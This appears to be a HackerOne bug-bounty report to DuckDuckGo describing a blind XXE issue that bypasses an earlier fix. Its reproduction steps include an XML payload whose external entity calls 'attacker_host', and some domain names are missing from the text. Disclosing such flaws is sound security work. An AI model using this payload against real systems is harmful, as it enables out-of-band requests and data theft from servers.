DuckDuckGo: Partial bypass of #483774 with Blind XXE on

ID H1:486732
Type hackerone
Reporter mik317
Modified 2019-02-25T16:42:25


Summary: Hi DuckDuckGo team, I've contacted previously you because in a second time (on the #483774 report), I've seen that was possible bypass the fix. Anyway, I've not got any response, and because I think that this is a bit dangerous issue, I'm opening another report for the bypass. Hope you'll agree.

Steps for reproduction: 1. Attacker creates a public server and hosts a file with the following content:

xml <?xml version="1.0" ?> <!DOCTYPE root [ <!ENTITY % ext SYSTEM "http://attacker_host/Blind_xxe"> %ext; ]> <r></r> 2. User goes on 3. The http://attacker_host/Blind_xxe resource will be requested by an host {F413045}

I'd like to say that this affects not only, but also Anyway, the #483908 report is still in the triaged state, so I think that will not be right against you submit another report also for the domain.


Blind XXE leads to dos and blind injection.